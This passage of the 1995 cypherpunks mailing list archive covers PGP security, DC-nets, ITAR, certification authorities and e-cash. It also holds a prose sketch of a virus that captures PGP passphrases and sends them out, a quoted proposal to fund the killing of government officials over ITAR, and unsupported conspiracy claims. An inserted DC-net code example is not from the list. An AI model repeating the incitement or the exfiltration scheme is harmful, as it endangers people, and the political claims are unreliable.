I think the only way to be safe is to actually boot up off of the CD-ROM, 
and hope that the hardware in your computer physically hasn't been 
tampered with :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Sat, 25 Nov 1995 07:05:21 +0800
To: cypherpunks@toad.com
Subject: Re: Sun speaks out - but not to the cypherpunks
In-Reply-To: <199511050203.SAA01370@jobe.shell.portal.com>
Message-ID: <495i89$1db@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com writes:

>The CBC (Canadian Broadcasting Corporation) detailed a software
>code problem in one of AECL's (Atomic Energy of Canada Limited's)
>instruments which deliver penetrating radiation.

>The software which controlled the radiation dose, would periodically
>override the oncologist's calibration and deliver a radiation dose
>100 times what was prescribed. This software "bug" literally killed
>wherever the machine was in use.

 . . .

>Or alternatively, another lesson could be pulled out: To avoid this
>problem, ensure that your code is mathematically provable or utilize
>appropriate hardware overrides.

If this is the same case I read of two or three years back, it
should be noted that not one but three safety interlocks had to fail
simultaneously -- one human, one hardware, one software.  The software
glitch has gotten the biggest play in the press, but it was not the
sole cause of the problem.
-- 
Yea, the heavens shall open and the NP-complete solution given forth.
ATT executives shall give birth to two-headed operating systems, and 
copyrights shall be expunged.  The voice of the GNU shall be heard,
but the faithless will be without transceivers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Still <x93ojg@juliet.stfx.ca>
Date: Sat, 25 Nov 1995 07:09:21 +0800
To: CypherPunks List <cypherpunks@toad.com>
Subject: (PGP in Canada) another new question.
In-Reply-To: <9511241348.ZM19179@squirrel.com>
Message-ID: <Pine.A32.3.91.951124190148.83732B-100000@juliet.stfx.ca>
MIME-Version: 1.0
Content-Type: text/plain


Is pgp able to be put on a university network and used by all the 
students?  I am again referring to use in Canada.

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg@stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sat, 25 Nov 1995 04:03:32 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: Virus attacks on PGP
In-Reply-To: <Pine.LNX.3.91.951124150849.7425A-100000@prufrocks.scranton.com>
Message-ID: <"swan.cl.cam.:180670:951124195035"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Where can one get PGP burnt into cdrom? Or the equipment to do it

If you can wait a while, TERENA (UKERNA, SURFnet, etc) are producing a PGP CD
at the start of next year ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 25 Nov 1995 10:06:54 +0800
To: Gary Jeffers <gjeffers@socketis.net>
Subject: [rehash] Re: crypto for porno users
In-Reply-To: <199511241535.JAA30731@mail.socketis.net>
Message-ID: <Pine.3.89.9511242032.A16013-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Watch the cpunks go round and round and round and...

On Fri, 24 Nov 1995, Gary Jeffers wrote:

>    I know little of the theory of Dining Cryptographers but I would think
> that a good implementation of it would make infiltrators useless. I will
> leave it for other Cypherpunks to discuss the mechanics (specific and
> general) for actually doing this.

Dining Cryptographers nets (aka DC-nets) are the whole idea behind the
type 2 anon remailers like Mixmaster, and the remailernet in general.
You'll find a lot on this in the archives, the ftp site (which has Chaum's
DC article and a good explanation by Tim May) and a few people's pages. 
(I think they're mostly pointed to in the pages I list) 

You'll find Mixmaster at <http://obscura.com/~loki/Welcome.html>
Wei Dai posted some articles a few months ago about traffic analysis
of such remailers. He still has one of them at 
<http://www.eskimo.com/~weidai>
Sameer also has a two-way encrypted-command remailer. Check out 
<http://www.c2.org> for details.
The archives are at <http://www.hks.net/cpunks/index.html> (I realize
this has been posted n zillion times)

Wasn't there a DC-net mailing list once upon a time? (Tim mentions it in some
of his writings) Did this wither away or merge into the remailer-ops list?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sat, 25 Nov 1995 14:18:47 +0800
To: Thomas E Zerucha <master@internexus.net>
Subject: Re: Virus attacks on PGP
Message-ID: <acdc55c10202100472f8@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 2:46 PM 11/24/95, Thomas E Zerucha wrote:
....

>I don't know if I mentioned, but I keep PGP and my keys on pcmcia memory
>cards that aren't in the system at the same time as a network or modem
>card.  Moreover I can also simply use the DOS version (I use linux to
>communicate) - It would require quite an effort to create a virus that
>would work and pass data across the required OS problems and not break
>with the twice a week kernel-level changes :).
....
Yes it would be hard. When you choose your own protection as above an
opponent would have to mount a significant effort just to get your stuff.
....
>It takes quite an effort to create a complex virus to do this.  It
>reminds me of the Glomar Challenger that was used to recover the remains
>of a Russian sub (my memory is somewhat faulty).  Such a virus would
>require a great investment in time and money.  What target would be worth it?
>Many otherwise feasible things aren't economically practical.

Yes, but if your particular habits became widespread, an intelligence
agency could amortize the virus effort across many victims.

Here is just one such complicated virus:
Sit in the OS watching for PGP to be launched. Patch PGP on the way in. The
patch writes to disk the location and password for the secure key ring.
Concurrently the virus watches for there to be IP service and sends the
disk information as a UDP.
Alternatively the virus waits for idle time, (screen saver time) and dials
an 800 number having turned off the modem speaker. But don't send the same
data twice!

There is a significant hazard for the virus producer here if someone finds
the code and learns the 800 number. I am sure that the Telco would help
locate the physical phone to which the 800 number led. UDP provides more
ways to pigeon drop the secret so as to protect the reader of that data.
Perhaps you can send the UDP to the NY-Times (or to your favorite enemy)
over a line that you are tapping. The NYT will discard it and no one is the
wiser. The virus is then anonymous.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Sat, 25 Nov 1995 20:31:37 +0800
To: cypherpunks@toad.com
Subject: CJR_war
Message-ID: <Pine.BSD/.3.91.951124222618.23929A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain




      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Sat, 25 Nov 1995 11:42:46 +0800
To: cypherpunks@toad.com
Subject: Re: Virus attacks on PGP
In-Reply-To: <Pine.LNX.3.91.951124150849.7425A-100000@prufrocks.scranton.com>
Message-ID: <Pine.LNX.3.91.951124222957.107A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 24 Nov 1995, Moroni wrote:

> 
>     Where can one get PGP burnt into cdrom? Or the equipment to do it
>              Thanks in advance
>                  moroni
> 
> 
> 

I remember seeing in a computer catalog a device that can burn data into a
cdrom and it even supplies blank cd's.  Unfortunately, I cannot remember
the name of the catalog.  It might have been _Tiger Software_ or some
similar catalog.  I do know that the technology is available.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQCVAwUBMLaOlrZc+sv5siulAQGpUgQAnj4I6lhgOX6Q6U9PctJn4pFcW7ncRguT
Npv8w7GR5TzBY7fejmiwVGqjSkw86trCvJwwR42azd2XAYU9t8zlSNO/r+dbqGQY
1mmA5RGUAuP5FVvVKoJqq0eYBhixe0E+G9/hBftqNlNAsIEuQ+sRd1MkoR1zu4R+
27+lBhQ72as=
=j0/5
-----END PGP SIGNATURE-----


`finger -l markm@omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 26 Nov 1995 15:43:48 +0800
To: Moroni <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: crypto for porno users
Message-ID: <199511260734.XAA14199@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:14 PM 11/25/95 -0500, Moroni wrote:
>
>   I'm sorry but I don't care if the images come from Mars. Jerking off 
>to the images of kids is sick.

An image of a sixteen year old girl masturbating is classified 
as child pornography in American law:  Think about how old 
you were when you first engaged in sexual acts.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sun, 26 Nov 1995 04:51:44 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk Certification Authority
Message-ID: <Pine.SUN.3.91.951124235921.16448A@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


	Since now Netscape allows for user defined certification authorities
I would like to hear some ideas for a Cypherpunk CA. Probably run by one 
of the respected members in the group such as Sameer, Perry or Tim. I would
like to hear some discussion about creating the certificates based on
the web of trust of your PGP key, etc. Any takers?

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 25 Nov 1995 15:18:27 +0800
To: cypherpunks@toad.com
Subject: Re: crypto for porno users
In-Reply-To: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>
Message-ID: <PVV4eD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> writes:
>      The second is that given new image modification technologies,
> it is possible to produce what will seem child pornography, but
> with no actual harm done to children. In some ways, this product
> may reduce harm to children in some respects by providing a
> "competing product" to actual child pornography, and thus
> discourage its manufacture.
...

I recall that a man was recently convicted in Canada on child pornography
charges (sorry, can't recall the exact statute name) for, basically, drawing
naked kids on his computer. No children were harmed, or otherwise involved in
producing the material, but the courts found it to be child pornography.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 25 Nov 1995 09:31:24 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: real life problems with ITAR (was Spam the Sign!)
In-Reply-To: <m0tJ1o2-0008zJC@pacifier.com>
Message-ID: <Pine.BSD.3.91.951124185244.23968A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, jim bell wrote:

> 
> Attila@primenet.com said:
> 
> >   On Thu, 23 Nov 1995, jim bell wrote: 
> > 
> >> I very much agree with the direction you appear to be headed in.  It seems
> >> to me that Netscape should have no problem devising some sort of scenario in
> >> which such a program eventually gets onto the nets, but in a way that is
> >> squeaky clean, at least for THEM.  
> >> 
> >> 
> >> In addition, why should they even need to write the encryption part of their
> >> software IN the US?  It occurs to me that one way to do this might be to
> >> send one of their programmers to a conveniently-located place, such as
> >> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
> >> deal of fanfare, and tell him to "write some crypto."  He does, and brings
> >> it back into the US with him, leaving a copy of it "outside" the country for
> >> international distribution.
> >> 
> >    <attila sez>  I think they have that one covered --not only is it 
> >violation of ITAR's intent to send a programmer out of the U.S.
> 
> Well, don't assume that because something's a "violation of ITAR's INTENT"
> it is actually a violation of ITAR.    It can't be assumed that ITAR is
> _perfect_:  That it actually prohibits every activity the government that
> wrote it didn't like.
>
    	<#2 attila sez> the problem with the U.S. government is the U.S. 
    conspiracy laws. If they have insufficient evidence to convict on 
    "actual" violations, they use the concept that you were _part_ of a
    conspiracy to _circumvent_ the laws. 

 
> , but is 
> >illegal to hire a foreign national to program for your non-U.S. products.
> 
> Sure about this?!?
>
	<#2 attila> I don't have to push all my data into glimpse to find 
    the article, but it's there. there are other sources, but not open to 
    discussion; sorry.
 
> >    the test is going to be with someone like Sun who "bought" a group of 
> >Russian crypto programmers and left them in Russia.  Now, the problem 
> >with ITAR is that if you import that code, you can not then export the 
> >code since it is now covered by ITAR.
>
	<#2 attila> I guess I should have stated it better: what they are 
    trying to do, for instance with Sun, is treat that foreign entity as
    if it was a direct operating unit of the parent U.S. company.  OK,
    fine, you hire your Russian crypto programming team and my take from
    several conversation is that it is a _good_ team, but the U.S. wants
    to enforce the rule that the code produced in Russia for a "parent"
    American company is _a U.S. product_!  --in other words, the foreign
    division can not sell it overseas.  So far, no one has been charged, 
    but my sources say Sun is the most likely. 
	Either way you slice it, Sun is committed to world wide 
    compatibility, and with that goes security, including worldwide NFS.
    You figure it out... 
	what is the alternative for Sun, or Netscape? yup, close down in 
    the U.S. and go to Holland --oh, they can keep their sales offices in
    the U.S.  --but they will be paying import duty, or they will end up
    contracting local assembly.  closing down in the U.S. literally means
    off NASDAQ.
	the fact that our government is effectively totalitarian is their 
    paranoia -only paranoia that they might miss something or that they
    are not in total control stimulates the kind of attack on the 
    Constitution that is going on. 
 
> I didn't say that the code would ever be "re-exported":  A copy would be
> brought into the US for domestic use, and everyone else outside the border
> would get their own copy from an outside server. 
> 
> 
> >    secondly, it appears there is a move afoot to make it an ITAR 
> >violation to hire the foreign nationals to circumvent ITAR --basically, 
> >the Feds want to stop cryptography _everywhere_, including telling 
> >Russians they can not work for U.S. companies!  Just where do they think 
> >they are getting off?
> 
> It is for this kind of problem that I "invented" my concept of
> "Assassination Politics":  If everybody pissed off at this situation was
> willing to donate $10 to a fund to reward the deaths of a few government
> officials responsible for ITAR, I can well imagine that this would shake
> them up a bit.  
> 

Robert East <viking@pacifier.com> said
 > What all these postings show is the desire of the federal government to
 > attempt to control crypto.  In the past, they were, virtually, the only
 > source for encryption equipment and/or computer code.  Well, now that
 > isn't true anymore.  They came up with ITAR regulations to attempt to
 > put a lid on crypto and other technological developments but it is like
 > trying to use a sieve to carry water.  There are many programmers and
 > others who will produce code and make sure that it is exported
 > anonymously just to prove that the government isn't "All Powerful."
 > 
     	<#2 attila> yes, that is true, but that is not the point --we have
    been doing that ever since I have been involved in crypto. 20 years
    ago when the heat was on me, somebody else dumped it wherever. even
    simple things get the Feds' dander up and they need an example; if I
    had not had a U.S. Senator (and I never even met the gentleman) in my
    corner, I would have gone down for the big one in '76. 
	Look at the problem Phil Zimmermann is having --several hundred
    thousand dollars in legal fees so far --for what; the original
    algorithms were published in Scientific American in Oct 77 --and then
    there was _silence_.  Just try and find a copy of that issue in a
    public library; most were pulled. 
	I may have been really pissed off after a couple thugs in trench
    coats knocked on _my_ door early morning to read me my rights for
    "exporting technology to a foreign power," or being detained in a
    little white room for 36 hours at immigration after speaking at a
    conference in Sweden and another in Copenhagen that was highly
    critical of U.S. policy --and discussing advanced hardware techniques
    for emulating BCD machines in not BCD bit slices --just happened to
    match the old Burroughs 3500s which were in all the missile silos
    --now, whatever gave them that idea? :)
	Ask Phil Zimmermann if he would do it again-- I will, because I
    don't give a shit, am old enough that I can afford to have ethics, and
    I am a Jeffersonian democrat; Jefferson must be spinning over the 
    speed of light over what the _conservatives_ would do, let alone what
    the liberal Democrats will bleed and do, like Clinton, or Hillary and
    her lez buddy Thomases, who, unpaid, occupies an office in the front
    row (she was the one who was seen carrying Foster's files upstairs to
    Hillary). 

 > At some point in time the feds are going to put their collective tails
 > between their legs and go slink away to some convenient hiding place. 
 > I think it's a case of Pandora's box being opened with no way of
 > reclosing it. 
 >
	<#2 attila>  naw. they're too stupid and too paranoid to give up. 
    the U.S. has not had a free election since Lincoln's first term and
    Stanton wrote the War Powers Act which, to this day, has not been
    repealed. Russia has more democracy than the U.S. --even if they are
    totally SNAFU.  The U.S. hasn't degenerated to Hussein or the
    Ayatollah, but if NSA and Freeh have their way, it might. As Will
    Rogers said in the early 30s: "...go to the circus? why would I want 
    to do that when Congress is in session?"  or Mark Twain, who said
    something to the effect:  "...the only natural criminal class in
    America is our Congress...."
	it's all a matter of control, or the appearance of being in 
    control. No, they can't bust all of us, but they can set some pretty 
   painful and expensive example of a few of us.  ...been there, and done
   that! 

 > Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 26 Nov 1995 00:07:09 +0800
To: cypherpunks@toad.com
Subject: Money: Back to the Future?
Message-ID: <199511250137.CAA12316@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Wall Street Journal, Nov 23, 1995.

Money: Back to the Future?

By Walter Wriston (Former chairman of Citicorp)

Americans are about to begin using a new kind of money
that may have consequences for the Federal Reserve's
control of the money supply and almost certainly for the
velocity of money.

Over the years, people have used all kinds of things for
money, from the huge immovable stones in the front yards
of the residents of Yap Island to the more familiar
silver and gold. All these various mediums of exchange
will now be joined in our country by the "smart" card --
a piece of plastic embedded with a microchip.

Smart cards combine features of the following: automatic
teller machine cards that let you access your bank
account and draw cash; MasterCard or Visa cards that
permit you to buy now and pay later; and debit cards that
charge an account at the time of purchase. Not only can
smart cards do all of the above but they can also serve
as an "electronic purse" independent of your bank
account. These cards contain real money that can be spent
at stores and restaurants. In effect, the card is an
electronic traveler's check, but one that makes exact
change. In addition, the integrated circuit chip allows
a higher degree of security for the information stored
than do the current magnetic strip cards.

Smart cards are common in Europe and Asia, where some 400
million were shipped last year. The first large-scale use
of smart cards in this country will occur next year at
the Summer Olympics in Atlanta. Plans call for 300,000
rechargeable cards, and 700,000 disposable cards in
denominations of $25, $50 and $100. These cards would fit
nicely into the payment habits of Americans, since in the
U.S. it is estimated that 88% of transactions are done by
cash or check, and of these 83% are for less than $10. In
Atlanta, electronic "purse cards," which contain stored
value, could be spent at pay phones or vending machines.
When their stored value is exhausted, they are thrown
away. The smart cards, by contrast, can be taken back to
the issuer and recharged.

Their broad issuance and use could return America to
something very close to the free banking of the last
century, when every commercial bank issued dollar bills,
backed sometimes by the skill of the management,
sometimes by doubtful state bonds and sometimes by gold
or silver.

We have grown so accustomed to the familiar Federal
Reserve note that many forget that Americans had no
central bank for about 75 years -- from 1836, when
President Jackson vetoed the bill to renew the charter of
the Second Bank of the United States, to the start of
World War I, when the Federal Reserve Act was passed.
After the passage by New York state of the Free Banking
Act in 1838, the idea of state-chartered banks spread
across the country, and each commercial bank issued its
own dollar bills of various shapes and sizes.

This does not mean that the 19th century witnessed
complete currency chaos. In 1863, the National Bank Act
was passed to create a market in the government bonds
needed to finance the Civil War and to bring some order
to the private issuance of currency. The act required
that bank notes issued by commercial banks be uniform in
appearance and that they be backed by collateral
consisting of U.S. Treasury securities. As the old Civil
War bonds were paid off, the currency base of the country
declined some 60% from 1881 to 1890. This inflexible
system led to panics and instability.

To a certain extent, the Treasury Department during this
time assumed some of the functions of a central bank. All
during this period a debate raged, not about whether
America needed a central bank but about "free silver" and
the price at which the Treasury would buy gold and
silver. It was not until the eve of World War I that
passage of the Federal Reserve Act finally gave the U.S.
government a monopoly on the creation of money.

Now we may be going back to the future. The advent of
smart cards means that the Fed will lose its monopoly on
issuing currency, except that this time the new money
will be issued not only by banks but by all kinds of
companies, from convenience stores to telephone
companies. Nor is this the only trend threatening the
Fed's monopoly: Information technology is about to permit
the creation of both electronic token money and cash
money in cyberspace. Already we have Digi Cash in
Amsterdam reviving in modern guise something very close
to the old American free-banking system -- issuing
electronic money (backed by some depository bank holding
collateral in the form of Treasury securities) and
performing the clearing function.

None of this is necessarily a cause for panic. There is
very little, if any, evidence that government has managed
our currency values any better than the commercial banks
did in pre-Fed days. Indeed, the Nobel laureate economist
F.A. Hayek put it more strongly: "The history of
government management of money has, except for a few
short happy periods, been one of incessant fraud and
deception."

Still these new trends do present worries for central
bankers. If more and more firms issue cards for cash or
credit, what will be the effect on the velocity of money?
How will central banks form policies on the control of
the money supply if any company can issue electronic
purse cards on credit, with or without collateral? What
will happen if the issuer of the card goes broke?

As smart cards become more visible in America, regulators
and governments will begin to wonder about control of
money and credit. The European system of central banks
has produced an advisory report outlining a possible
regulatory response, and in this country some Fed
officials are starting to wonder if their regulations
will be applicable. If one definition of money is an
object that has no use except to be given to someone else
in exchange for goods or services, smart cards are money
-- and they are coming to your neighborhood soon.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 26 Nov 1995 01:45:59 +0800
To: perry@piermont.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511251650.LAA01055@jekyll.piermont.com>
Message-ID: <199511251732.JAA15922@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> though, that being an anti-fan of X.509 the situation would be ironic...
> 
> Perry

	Speaking of ironic situations, my sister recently
mentioned that her fiancee is a good friend of Jim Bidzos and asked
me if I wanted a job with RSADSI. If I wasn't planning on leaving
the employed-by-others arena I would have seriously considered it. ;-)

	In terms of being a CA. I have considered making Community
COnneXion a CA for its customers, but I haven't done much research
into what is involved in doing that.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 26 Nov 1995 02:24:18 +0800
To: cypherpunks@toad.com
Subject: Re: ecash protocol: living in denial
In-Reply-To: <199511250744.SAA14637@sweeney.cs.monash.edu.au>
Message-ID: <Pine.3.89.9511250939.A44825-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 25 Nov 1995, Jiri Baum wrote:

> >    - Ian "Why exactly isn't DigiCash releasing the protocol?  What about
> > 	    the source?"
> ...
> 
> A Source Close To Digicash That Did Not Wish To Be Quoted
> once described them as 'crown jewels' (competitive advantage).
Can you say RC4?

> 
> ASCTDTDNWTBQ then appealed to Digicash's track record.
> 
> I certainly hope that this genuinely is not Digicash's official opinion.
Heh.
Can you say RSADSI? (or Ron Rivest? Or NSA on Mr. Blaze's bogus LEAFs?
Need I say Elementrix non-algorithmic POTP?)

They were lucky Rivest's a decent cryptographer. (which reminds me,
what's the current list of "secure" block ciphers, besides for des and idea?
what's been analyzed or weakened lately? I'm too broke to get Schneier's 
2nd ed. to check.)

> Thank you for once again showing the futility of security by obscurity.

As Ian himself is demonstrating.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 26 Nov 1995 02:41:24 +0800
To: gjeffers@socketis.net>
Subject: Re: [rehash] Re: crypto for porno users
Message-ID: <acdd0f7b040210046a9a@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:05 PM 11/24/95, s1113645@tesla.cc.uottawa.ca wrote:
>Watch the cpunks go round and round and round and...
>
>On Fri, 24 Nov 1995, Gary Jeffers wrote:
>
>>    I know little of the theory of Dining Cryptographers but I would think
>> that a good implementation of it would make infiltrators useless. I will
>> leave it for other Cypherpunks to discuss the mechanics (specific and
>> general) for actually doing this.
>
>Dining Cryptographers nets (aka DC-nets) are the whole idea behind the
>type 2 anon remailers like Mixmaster, and the remailernet in general.
>You'll find a lot on this in the archives, the ftp site (which has Chaum's
>DC article and a good explanation by Tim May) and a few peoples' pages.
>(I think they're mostly pointed to in the pages I list)
>

I wish this were the case. Mixmaster is not based on the "Dining
Cryptographers" problem, but based on Chaum's "Digital Mixes".

Digital mixes hide the fact that A is communicating with B.
DC nets allow an individual A in a group of people A' to send a message
so that it is impossible to tell who in the group sent it (but it is known
to have been one of the members of A').

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------
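
[Added example, not part of Lance Cottrell's message or of any code from
the list: one round of a DC-net as described above, where a member of a
group sends a message and nobody can tell which member sent it. The XOR
construction with one shared pad per pair of members, the group size and
the sample messages are assumptions made for the illustration. It also
shows why two colluding members learn nothing about which of the other
two sent, and what happens when two members send in the same round.]

```python
"""Toy DC-net round (added illustration; XOR pads over a full key graph)."""
import secrets
from itertools import combinations


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def make_pads(n: int, length: int) -> dict:
    """One secret random pad per unordered pair of members."""
    return {pair: secrets.token_bytes(length)
            for pair in combinations(range(n), 2)}


def announcements(n: int, pads: dict, length: int, senders: dict) -> list:
    """What each member broadcasts in one round.

    Every member XORs together the pads it shares with the others; a member
    listed in `senders` also XORs in its message (exactly `length` bytes).
    """
    out = []
    for member in range(n):
        word = bytes(length)
        for pair, pad in pads.items():
            if member in pair:
                word = xor(word, pad)
        if member in senders:
            if len(senders[member]) != length:
                raise ValueError("message must be exactly one slot long")
            word = xor(word, senders[member])
        out.append(word)
    return out


def combine(words: list, length: int) -> bytes:
    """XOR of all broadcasts: every pad appears twice and cancels out."""
    total = bytes(length)
    for w in words:
        total = xor(total, w)
    return total


def demo():
    n = 4
    msg = b"meet at noon"      # constructed sample message
    other = b"meet at nine"    # second constructed message, same length
    length = len(msg)
    pads = make_pads(n, length)

    # Normal round: member 2 sends, and anyone can recover the message.
    words = announcements(n, pads, length, {2: msg})
    recovered = combine(words, length)

    # Members 1 and 3 collude and pool every pad they hold. The only pad
    # they lack is (0, 2). A different value of that one pad explains the
    # very same broadcasts with member 0 as the sender, so the transcript
    # cannot tell them whether 0 or 2 sent.
    alt_pads = dict(pads)
    alt_pads[(0, 2)] = xor(pads[(0, 2)], msg)
    alt_words = announcements(n, alt_pads, length, {0: msg})
    sender_ambiguous = (alt_words == words)

    # Failure mode: two senders in one round. The result is the XOR of
    # both messages, so neither is readable and the slot must be retried.
    collided = combine(
        announcements(n, pads, length, {1: msg, 3: other}), length)
    return recovered, sender_ambiguous, collided


if __name__ == "__main__":
    print(demo())
```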






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 27 Nov 1995 03:30:01 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <199511261922.LAA16753@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:53 AM 11/26/95 -0800, anonymous-remailer@shell.portal.com wrote:
>You'd rather sign before encryption??
>
>Doesn't that give you "known plain-text" to attack?

The signature is not known unless the whole message being signed is
known.

And any encryption scheme that is vulnerable to known plaintext attack
where only a part of the message is known, is worthless anyway.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 26 Nov 1995 00:57:25 +0800
To: Aleph One <aleph1@dfw.net>
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951124235921.16448A@dfw.net>
Message-ID: <199511251650.LAA01055@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Aleph One writes:
> 	Since now Netscape allows for user defined certification authorities
> I would like to hear some ideas for a Cypherpunk CA. Probably run by one 
> of the respected members in the group such as Sameer, Perry or Tim. I would
> like to hear some discussion about creating the certificates based on
> the web of trust of your PGP key, etc. Any takers?

Hmmm. If someone is willing to find out what is needed to become a
C.A. and to run one, and it turns out not to be particularly onerous,
I or one of my corporate alter egos might be willing. I must say,
though, that being an anti-fan of X.509 the situation would be ironic...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 27 Nov 1995 04:09:56 +0800
To: "Rev. Mark Grant" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: [NOISE] Re: crypto for porno users
Message-ID: <199511262001.MAA19515@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:42 PM 11/26/95 +0000, Rev. Mark Grant wrote:
> Incidentally, the "Sun" newspaper, one of the most popular in the UK
> (sells 3,000,000-4,000,000 copies daily, AFAIR), has often printed
> half-page erotic pictures of topless sixteen-year-old girls. Would this be
> "kiddie porn"  in the US ?

Yes

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 27 Nov 1995 04:17:09 +0800
To: cypherpunks@toad.com
Subject: Elliptic curves, current status?
Message-ID: <199511262008.MAA20100@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


I have read:

That public key cryptography using elliptic curves is much 
faster than using integers, for comparable security.

That public key cryptography using elliptic curves is much 
